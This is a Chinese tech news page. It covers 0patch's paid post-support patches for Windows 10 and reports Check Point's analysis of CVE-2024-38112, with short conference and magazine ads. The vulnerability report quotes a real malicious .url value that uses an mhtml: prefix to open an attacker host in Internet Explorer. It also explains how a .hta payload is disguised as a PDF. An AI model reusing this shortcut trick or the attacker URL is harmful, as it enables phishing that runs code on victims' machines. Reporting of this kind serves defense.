對于許多 Windows 用戶來說,2025 年 10 月 14 日是一個很特別的日子:那一天,Windows 10 會正式退役,自此微軟將不再提供官方支持。
也就是說,只剩下不到 500 天,Windows 10 就要變成“野孩子”了。
然而,近日 0patch 公司重磅宣布,屆時他們將無縫接棒微軟:等微軟終止支持 Windows 10 之后,0patch 會額外提供 5 年的安全補丁!
0patch 目前仍在為 Windows 7 提供支持
在進入正題前,我們先大致了解一下 0patch 這家公司。
從官網介紹來看,0patch 自詡是“解決巨大安全問題的微觀解決方案”,主要向全球計算機和其他設備發送微型代碼補丁(“微補丁”),以修復各種甚至閉源產品中的軟件漏洞:“有了 0patch,打補丁時無需重啟或停機,也不用擔心大規模的官方更新會破壞生產。”
據悉,0patch 所提供的微型代碼補丁非常輕便和簡單,讓軟件打補丁變得幾乎“難以察覺”:能把補丁部署時間從幾個月縮短到幾個小時,另外審查微型補丁的成本很低,且在本地或遠程即時應用和刪除補丁的能力也極大簡化了生產測試。
除此之外,0patch 還是一家致力于為過期產品提供安全更新的公司。
記得在 2023 年 1 月,當時微軟通過 ESU 計劃為 Windows 7 提供了最后一批安全更新,0patch 便立刻宣布將為 Windows 7 以及 Windows Server 2008 R2 設備提供微補丁服務至 2025 年 1 月:“我們決定繼續為 Windows 7 和 Windows Server 2008 R2 提供安全補丁,以修補可能被利用的關鍵漏洞。”
考慮到以上情況,此次 0patch 宣布為 Windows 10 繼續提供 5 年安全補丁的決定,似乎也就在意料之中了。
不想/不能升級 Windows 11,有兩種方案
事實上,盡管微軟一個勁兒地在強調 Windows 10 即將退役、為了安全需盡快升級到 Windows 11,但對于不少用戶而言,其實并沒有太多實感。
如果沒有其他支持,那么等到 2025 年 10 月 14 日究竟會發生什么呢?
或許可以參考早在 2020 年 1 月結束支持的 Windows 7:一臺在 2020 年經過最后一次更新的 Windows 7 電腦,若沒有額外的安全補丁則很容易就被入侵,目前光是公開已知會影響 Windows 7 的關鍵漏洞,就有 70 多個了。
以此類推,如果 2025 年 10 月之后 Windows 10 電腦不打補丁,很可能一個月內就會出現第一個關鍵漏洞,然后在隨后的幾個月內出現越來越多漏洞,并無限期地存在于電腦中。最后隨著時間的推移,電腦被入侵的風險必然會逐漸增大,除非你不聯網。
因此微軟建議,讓 Windows 保持安全的唯一“免費”方法,就是升級到 Windows 11——但 0patch 說出了許多人的心聲:“我們中的許多人,不想或根本不能升級到 Windows 11。”
不想升級,是因為我們已經習慣了 Windows 10 的用戶界面。不想去搜索某個按鈕被移動到了哪里,也不想知道為什么我們每天都在用的應用不在了。現有的 Windows 10 已經能滿足我們的一切需求。
不想升級,是因為 Windows 11 中臃腫軟件、開始菜單廣告和嚴重的隱私問題等情況越來越多,也不想讓 Recall 這樣的功能不斷記錄我們在電腦上的活動。
不想升級,是因為有些應用可能無法在 Windows 11 上運行,例如醫療設備、制造設備、POS 終端、特殊用途設備和 ATM,它們運行在 Windows 10 上,無法輕松升級。
不能升級,是因為我們的硬件根本可能不符合升級到 Windows 11 的條件。據 Canalys 估計,全球有 2.4 億臺計算機不符合 Windows 11 硬件要求,缺乏可信平臺模塊(TPM)2.0、支持的 CPU、4GB 內存、具有安全啟動功能的 UEFI 固件或支持的 GPU。
在這種情況下,多數用戶有兩種方法可以確保 Windows 10 繼續安全運行:擴展安全更新(ESU)或者 0patch。
0patch 更便宜、承諾提供更長時間的支持
其中,擴展安全更新(ESU)是微軟官方給出的一種臨時解決方案,主要是針對組織和企業從 Windows 10 過渡到新的操作系統時使用:如果你想繼續安全地使用 Windows 10 ,就必須要付費。
目前,ESU 的定價只針對企業和教育組織,面向個人消費者的定價尚未公開。其中教育組織的收費很便宜, 三年只需 7 美元,而企業則相對貴了許多:第一年每臺 PC 將收取 61 美元(人民幣約 443 元)的費用,第二年 122 美元(人民幣約 886 元),到了第三年要為每臺 Windows 10 設備支付 244 美元(人民幣約 1772 元)的價格來獲得安全更新。
0patch 指出,按照擴展安全更新(ESU)的收費標準,如果企業中有 1 萬臺 Windows 10 電腦,則需花費 400 萬美元。
“如果有一種方法,可以花更少的錢得到更多的東西就好了……”
出于這個想法,0patch 宣布從 2025 年 10 月起,他們將為 Windows 10 提供至少 5 年的關鍵安全補丁——如果市場有需求,時間甚至會更長。
在官方博客中,0patch 介紹自己是 Windows 唯一的非官方安全補丁提供商,并具體描述了其補丁的特點:針對 2025 年 10 月 14 日之后 Windows 10 中可能被利用的重要漏洞,0patch 將提供“微補丁”。
這些補丁非常小,通常只有幾條 CPU 指令,并可應用于內存中正在運行的進程,而不會修改二進制文件的任何字節。
下載補丁后無需重啟計算機,因為在內存中應用補丁只需短暫停止應用、打上補丁,然后讓它繼續運行即可,用戶甚至不會注意到他們在編寫文檔的時候就已經打上了補丁。
不過與微軟的 ESU 一樣,0patch 也不是一項免費服務,只是它承諾提供更長時間的支持和更多好處,例如更快、干擾更少的補丁,修復制造商未觸及的漏洞,以及為非微軟產品提供補丁等等。
據悉 0patch 按年訂購,面向個人和小型企業的 0patch PRO 每臺電腦 24.95 歐元(人民幣約 192 元)+稅,而適用于大中型企業的 0patch Enterprise 每臺電腦 34.95 歐元(人民幣約 271 元)+稅。0patch 也補充道,未來這個價格可能會調整,但任何以當前價格訂閱的用戶都可以在兩年內繼續以此價格訂閱。
參考鏈接:
https://blog.0patch.com/
https://www.neowin.net/news/windows-10-will-get-five-years-of-additional-support-thanks-to-0patch/
由 CSDN 和 Boolan 聯合主辦的「2024 全球軟件研發技術大會(SDCon)」將于 7 月 4 -5 日在北京威斯汀酒店舉行。
由世界著名軟件架構大師、云原生和微服務領域技術先驅 Chris Richardson 和 MIT 計算機與 AI 實驗室(CSAIL)副主任,ACM Fellow Daniel Jackson 領銜,華為、BAT、微軟、字節跳動、京東等技術專家將齊聚一堂,共同探討軟件開發的最前沿趨勢與技術實踐。
誰能想到,早在 2022 年 6 月 15 日正式退役的 IE 瀏覽器,近日還能因漏洞被推上風口浪尖?
全球網絡安全解決方案提供商 Check Point Research(簡稱為 CPR)最近發現:有攻擊者在過去 18 個月里,通過構建特殊的 Windows Internet 快捷方式文件(即 .url),引誘用戶點擊并調用 IE 瀏覽器來訪問攻擊者控制的 URL,以此進行惡意攻擊。
據了解,這種漏洞甚至可以繞過 Windows 10、Windows 11 系統的安全防護。
強制調用 IE 瀏覽器打開 URL
據悉,該漏洞由 CPR 研究人員發現,追蹤編號為 CVE-2024-38112,微軟方面將其描述為 Windows MSHTML 平臺欺騙漏洞,自 2023 年 1 月以來就一直在被黑客利用:“我們發現的惡意 .url 樣本最早可以追溯到 2023 年 1 月(一年多前),最晚可以追溯到 2024 年 5 月 13 日。這表明,網絡罪犯使用這種攻擊技術已經有一段時間了。”
通過對攻擊過程的詳細分析,CPR 研究人員將該漏洞的實現分解為兩個步驟:
第一步是利用“mhtml”技巧,使得攻擊者可調用已退役的 IE 而非更安全的 Chrome/Edge。
第二步是通過某種 IE 技巧隱藏 .hta 這個擴展名,讓受害者以為他們只是打開了一個 PDF 文件——但實際上,他們正在下載并啟動一個惡意的 .hta 應用程序。
那么接下來,我們就先了解一下這個能在 Windows 中調用 IE 瀏覽器的“mhtml”技巧。
一般情況下,Internet 快捷方式文件(即 .url)是一個文本文件,里面包含各種配置信息,如顯示什么圖標、雙擊時打開什么鏈接等。將其保存為 .url 文件并雙擊后,Windows 會在默認瀏覽器中打開這個 URL。
然而,攻擊者發現可以在 URL 指令中使用 mhtml: URI 處理程序,以此強制用 IE 瀏覽器打開指定的 URL。以下面這個惡意 .url 樣本為例:
可以看到,.url 文件的最后幾行字符串指向 Microsoft Edge 應用程序文件中的一個自定義圖標。乍一看,它似乎指向一個 PDF 文件,但實際上并非如此。CPR 研究人員發現這個關鍵字的值與通常的關鍵字有很大不同:普通 .url 文件的參數類似于 URL=https://www.google.com;但這個惡意樣本的值是 URL=mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html。
它使用了一個特殊的前綴“mhtml:”。簡單說明一下 MHTML,這是一種“聚合 HTML 文檔的 MIME 封裝”文件,是 IE 瀏覽器中引入的一種存儲文件技術,可將包括圖像在內的整個網頁封裝成一個單一檔案。
CPR 研究人員指出,這樣的惡意 .url 文件在 Windows 11 中會顯示為一個指向 PDF 文件的鏈接:
如果受害者想打開 PDF,雙擊這個 .url 文件,然后便會彈出下面這個來自 IE 瀏覽器的窗口:
沒錯,攻擊者使用 mhtml: URI 啟動 URL 后,Windows 會自動在 IE 瀏覽器中啟動 URL,而不是默認瀏覽器。如文章開頭所說,IE 瀏覽器早在 2022 年就退出歷史舞臺了,在典型的 Windows 10/11 操作系統上,因其安全性不足,用戶一般無法直接用 IE 去訪問網站。
不過有一點需要明確:盡管 IE 已被微軟宣布“退役”,但從技術上講,IE 仍是 Windows 系統的一部分,IE 使用的專有瀏覽器引擎 MSHTML (Trident)也仍包含在操作系統中,微軟計劃至少支持該引擎到 2029 年。
因此,攻擊者使用“mhtml”技巧,讓本意想打開 PDF 的用戶,實際上正在用不安全且過時的 IE 訪問攻擊者控制的網站,尤其在 IE 下載惡意文件時安全警告也相對較少。
打開一個偽裝成 PDF 的惡意 .hta 文件
既然打開的不是 PDF,那受害者通過 IE 打開的到底是什么呢?
根據 IE 瀏覽器的彈出窗口顯示,它要求用戶打開一個名為 .Books_A0UJKO.pdf 的 PDF 文件:
可一旦點擊了這個“Open”(默認選項),緊接著又會跳出另一個窗口:IE 保護模式下的警告提示。
到了這一步,如果用戶一直以為自己打開的不過是個 PDF,大概率會忽略這個警告,那么打開的就會是一個偽裝成 PDF 的惡意 .hta 文件。這是一個從 HTML 文檔中調用的可執行程序,通過一個名為 Microsoft HTML Application Host(mshta.exe)的工具在 Windows 上運行。
CPR 研究人員解釋道:“如果我們仔細觀察 HTTP 流量,就會發現在字符串末尾有許多不可打印的字符——最后是 .hta 字符串,這才是真正的(危險的)擴展名。”
但這個 .hta 字符串被隱藏了:用戶看不到真實的擴展名,所以無防備地繼續點擊文件,根本不知道自己其實正在下載并啟動一個危險的 .hta 應用程序。
一定要警惕從不可信來源發送的 .url 文件
據 CPR 研究人員證實,這個漏洞所用的技巧在 Windows 10/11 操作系統上均可實現。
于是,CPR 方面在 2024 年 5 月 16 日向微軟安全響應中心(MSRC)報告了該漏洞。此后,雙方一直就此事密切合作,終于在 7 月 9 日發布了微軟官方補丁(CVE-2024-38112)。
從通用漏洞評分系統(CVSS)來看,CVE-2024-38112 的評分為 7.5(滿分 10 分),屬于重要漏洞,攻擊者需采取額外行動才能確保成功利用該漏洞。而不論是微軟還是 CPR,都強烈建議 Windows 用戶盡快更新該補丁,因為根據調查顯示該漏洞已被黑客利用一年多了。
最后,CPR 也給出了重要提醒:“對于相關的 Windows 用戶,我們建議一定要警惕從不可信來源發送的 .url 文件,畢竟這種類型的攻擊需要一些用戶交互(如忽略警告彈窗)才能成功。”
參考鏈接:
https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112
大模型刷新一切,讓我們有著諸多的迷茫,AI 這股熱潮究竟會推著我們走向何方?面對時不時一夜變天,焦慮感油然而生,開發者怎么能夠更快、更系統地擁抱大模型?《新程序員 007》以「大模型時代,開發者的成長指南」為核心,希望撥開層層迷霧,讓開發者定下心地看到及擁抱未來。
讀過本書的開發者這樣感慨道:“讓我驚喜的是,中國還有這種高質量、貼近開發者的雜志,我感到非常激動。最吸引我的是里面有很多人對 AI 的看法和經驗和一些采訪的內容,這些內容既真實又有價值。”